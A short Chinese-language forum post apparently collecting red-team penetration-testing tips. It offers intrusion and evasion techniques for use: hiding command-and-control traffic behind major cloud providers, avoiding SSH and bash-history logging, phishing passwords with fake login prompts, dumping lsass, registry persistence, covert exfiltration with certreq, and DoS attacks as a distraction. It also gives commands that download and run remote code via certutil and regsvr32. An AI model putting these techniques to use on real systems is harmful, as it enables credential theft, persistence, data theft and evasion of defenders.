我收集了一些渗透测试tips,同时欢迎大家补充。
1.使用高知名度的网站(如:Google ,aws)做C&C 控制服务器,这样可以绕过白名单限制;
2.使用cleanwipe删除文件,因为它不需要管理员权限;
(工具见:https://support.symantec.com/en_US/article.HOWTO124983.html)
3.扫描所有的内网网段(192.168.0.0/16,172.16.0.0/12,10.0.0.0/8),而不是你所在的内网网段,你可能会发现一些被遗忘的网络或主机;
4.使用 net user /dom 代替 net user /domain,因为net user /domain关键词 有可能被终端安全软件监控着;
5.使用wmiexec 代替 psexec,因为wmiexec留下更好的日志记录;
6.在 Windows下,如果你想上传文件到磁盘,请使用Invoke-ADSBackdoor.ps1(https://github.com/samratashok/nishang/blob/master/Backdoors/Invoke-ADSBackdoor.ps1 )这个脚本。
7.如果你有一个windows低权限的shell,你可以使用fake login prompt(https://github.com/enigma0x3/Invoke-LoginPrompt/blob/master/Invoke-LoginPrompt.ps1)来钓鱼获取帐号密码;
8.如果你不想在肉鸡里使用mimikatz获取明文密码,你可以把lsass dump下来,拷贝在本地进行分析;
9.使用ssh -l username target -T 登陆ssh,这样可以避免被wtmp记录;
10. 在退出ssh时候,使用 kill -9 $$ ,这样不会在bash history中留下日志;
11. 在联网时,如果你发现你被NAC屏蔽了,你可以监听广播收集mac地址,然后使用打印机的mac地址接入网络;
12. 隐藏自己真实目的,可以用nessus,netsparker等扫描外网,或小量Dos/DDos攻击外网IP,这样迷惑蓝队;
13.使用ROPEMAKER 和CVE-2017-0199 进行邮件钓鱼;(ROPEMAKER 开心就好了)
14.可以使用 certutil.exe 下载文件,使用方法为:certutil -urlcache -split -f <url> <out_filename>;
15.可以使用regsrv32 /s /u dll_name 执行我们的dll;
16.可以使用regsvr32 /s /n /u /i:<url> scrobj.dll 加载执行远程的脚本;
17.网络钓鱼中,我们可以利用smtp relay ;
18.你可以用目标的主机名作为密码来加密你的payload或者word 宏;
19.你可以用HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ 的Debugger 值来保持权限;
20.在使用自动化扫描工具时,你需要限制连接数,避免网络丢包或者IP被封;
21.可以使用certreq.exe 进行Windows的数据隐蔽窃取;